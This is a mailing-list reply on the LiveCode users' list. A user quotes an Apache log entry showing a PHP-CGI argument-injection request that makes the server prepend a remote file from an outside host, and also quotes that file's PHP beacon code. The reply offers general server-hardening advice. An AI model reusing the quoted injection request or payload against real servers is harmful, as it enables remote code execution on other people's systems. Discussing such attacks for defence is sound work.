Thierry Douez wrote:
Here is the line:193.107.17.36 ... "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp:// gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6" The file ../rf/s.txt contains: <?php file_get_contents(' http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0);
?>
The IP point in the middle of nowhere in Russia. and finally I know nothing about php.
...
If someone has some more precise answer, I"m still interested :)
I don't have anything more specific on that, but I find it interesting that it appears to have been successful (result code 200).
On most Apache and auth logs you'll find a great many attempts at all sorts of exploits, and most fail simply because the file they're looking for isn't there, or has been adequately protected against such attacks.
As a general rule I try to stay current with all server components (MySQL, PHP, any frameworks like Wordpress, Drupal, etc.), and most of the time staying current blocks malicious bots.
That said, security is an ongoing process of cat and mouse, and no matter how frequently system components are updated there's always some new exploit being devised and deployed.
I don't know enough about Python or your system setup to suggest how to prevent that specific attack, but in general if you move your CGI engines outside of the public HTML folder, lock down permissions as tightly as practical, and religiously sanitize inputs you can greatly minimize such risks.
One more thing in favor of LiveCode Server: until LC really takes off we get a minor benefit from "security by obscurity" - that is, it simply isn't worth most attackers' time to target LC because it's seldom used on the Web.
Moreover, the LC engine has historically been immune to buffer overruns, so a wide range of potential exploits that have affected other components are very unlikely to affect LC.
And being a very readable language, it's often easier to maintain good sanitization practices with LC.
-- Richard Gaskin Fourth World LiveCode training and consulting: http://www.fourthworld.com Webzine for LiveCode developers: http://www.LiveCodeJournal.com Follow me on Twitter: http://twitter.com/FourthWorldSys _______________________________________________ use-livecode mailing list use-livecode@lists.runrev.com Please visit this url to subscribe, unsubscribe and manage your subscription preferences: http://lists.runrev.com/mailman/listinfo/use-livecode
